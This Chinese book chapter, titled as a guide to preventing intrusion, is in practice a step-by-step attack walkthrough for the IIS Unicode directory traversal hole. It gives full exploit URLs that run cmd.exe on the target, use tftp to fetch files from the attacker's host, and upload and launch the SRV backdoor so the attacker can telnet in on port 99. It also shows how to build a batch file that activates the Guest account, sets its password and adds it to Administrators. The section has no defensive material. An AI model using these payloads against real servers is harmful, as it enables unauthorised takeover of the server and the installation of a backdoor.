黑客攻防技术内幕-防止入侵的方法(15)

6.9.3  UNICODE漏洞入侵高级篇

一般的入侵者在简单的更改页面后就离去，而遇上一些技术较高的入侵者则要完全控制存在UNICODE漏洞的服务器，甚至是整个局域网络，有时甚至还格式化被入侵成功的服务器，或者上传后门工具，上传病毒等，破坏手法各不相同，这样将给被害服务器造成重大的危害。接下来结合前面所了解的内容，看看入侵者是如何破解系统控制整个服务   器的。

入侵者直接通过过浏览器来更改目标机的主页，也只具有Guest的权限，为了可以获取更高的权限，入侵者将使用一个TFTP的程序，将自己的计算机做成一个FTP主机，然后通过向目标服务器上传后门工具，从而来获取更高的权限，接下来将看看入侵者是如何利用TFTP软件对存在UNICODE漏洞的服务器进行攻击的。

(1) 入侵者首先会下载TFTP软件，首先来认识一下这个程序，这是一个小巧的FTP服务器，在运行它之前首先关闭其他FTP服务器，以保持TFTP的运行，当运行此程序后，入侵者的机器已经是一个FTP服务器了。

运行TFTP后将出现如图6-89所示的画面。

图6-89  TFTP启动界面

Base Directory显示的是TFTP所在的目录，从图4-1中Base Directory可以看出TFTP存放在E盘的TFTP文件夹中。如果要向目标机上传文件，该文件必须存放在Base Directory显示的路径下。Servet Address中显示的是服务器的IP地址，该程序将自动显示本地机IP地址。Current Action指当前动作，如果没有连接目标机的话，则显示【监听69端口】。通过单击Settings按钮来设置更多的选项。最小化TFTP程序后TFTP将变成小图标被放置到任务栏并在后台运行。

(2) 接下来入侵者找到一台存在UNICODE漏洞的服务器，找到存放主页的位置(比如C:\\inetpub\\scripts\\wwwroot\index.htm)并查出其首页名(这里比如其首页文件名是index.htm)，然后打开浏览器窗口，在地址栏中输入以下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i ???.???.???.??? GET index.htm c:\\inetpub\\scripts\\wwwroot\index.htm

提示：

“???.???.???.???”为本机的IP地址，也就是TFTP中Servet Address文本框中显示的IP地址，这里以127.0.0.1为检测地址。index.htm是目标机的首页名，入侵者将制作好的页面存放到TFTP文件夹下(如图6-90)，上传到目标服务器中覆盖原有的index.htm文件，从而达到完全更改首页的目的(如图6-91)。c:\\inetpub\\scripts\\wwwroot\index.htm为目标机主页存放的位置。

图6-90  将要上传的index.htm文件放入tftp文件夹中

图6-91  被更改的页面

(3) 完全控制主机。入侵者如果要想完全控制存在UNICODE漏洞的主机，并取得超级管理员的权限，一是使用TFTP工具上传后门程到目标机，二是在目标机上建立一个批处理文件，并写向其中写入建立Administrator用户的指令，从而取得超级用户的权限，并完全控制目标服务器。

● 使用TFTP软件向目标机上传后门程序，比如蓝色火焰、SRV等后门程序。下面以后门程序SRV为示例，如果在目标机上运行后将会开启99号端口，可以通过Telnet登录到目标机。入侵者首先将SRV程序放置到TFPT所在的文件夹中，并运行TFTP程序，可在浏览器的地址览中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i ???.???.???.??? GET srv.exe d:\\inetpub\\scripts\\srv.exe

提示：

将TFTP文件夹下srv程序上传至目标机D盘inetpub\scripts\下。

此时TFTP程序窗口中显示该程序被成功上传至目标机，如图6-92所示。

图6-92  TFTP运行界面

也可以向浏览器的地址览中输入如下内容来查看该后门程序是否被上传：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\inetpub\scripts

SRV后门程序被成功上传至目标服务器后，接着入侵者会向浏览器的地址栏中输入如下内容来启动该后门程序：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d:\inetpub\scripts\srv.exe

当SRV后门程序被启动后，此时目标服务器已开放了一个99端口，入侵者可以通过Telnet程序直接登录到目标服务器。

其步骤是：选择【开始】→【运行】命令，在【运行】对话框的【打开】下拉列表框中输入telnet 127.0.0.1 99或是打开MS-DOS(Windows 2000中打开命令提示符)，在提示符下输入telnet 127.0.0.1 99后按Enter键，意思是：远程登录到目标机99端口。 成功后将如图6-93所示(以中文版Windows 2000登录为例)：

图6-93  通过srv程序远程登录到目标服务器

● 通过建立批除理文件，来获取超级用户的权限，并完全达到控制服务器的目的。

入侵者找到存在UNICODE漏洞的主机后，入侵者将会向存在UNICODE漏洞的服务器提交以下3条请求：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c echo net user guest /active:yes>123.bat   

如图6-94所示。

图6-94  激活用户名Guest

提示：

利用echo命令和管道命令>将net user guest /active:yes写入到批处理文件123.bat中，net user guest /active:yes命令是指将用户名guest激活，bat就是批处理文件的扩展名，这里的123.bat文件将通过管道命令>自己建立，并存在inetpub/scripts文件下。

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo net user guest 12345>>123.bat

提示：

追加net user guest 12345命令到123.bat文件中，net user guset 12345命令是指为用户名Guest设置密码为12345。

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo net localgroup administrators /add guest>>123.bat   

提示：

追加net localgroup administrators/add guest命令到123.bat文件中，net localgroup administrators /add guest命令是指将Guest用户名添加到Administrators组里，也就是超级用户组里。

这时可以使用Type命令查看123.bat的内容，查看上面3条命令内容是否被追加到文件123.bat中，向浏览器中的地址框输入以下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+d:\inetpub\scripts\123.bat

如图6-95所示。

图6-95  查看123.bat文件的内容

接下来让服务器运行123.bat文件(运行方法前面已介绍)，此时用户Guest将被添加到Administrators组里，密码为12345，此时入侵者可以通过很多方法来达到完全控制服务器的目的。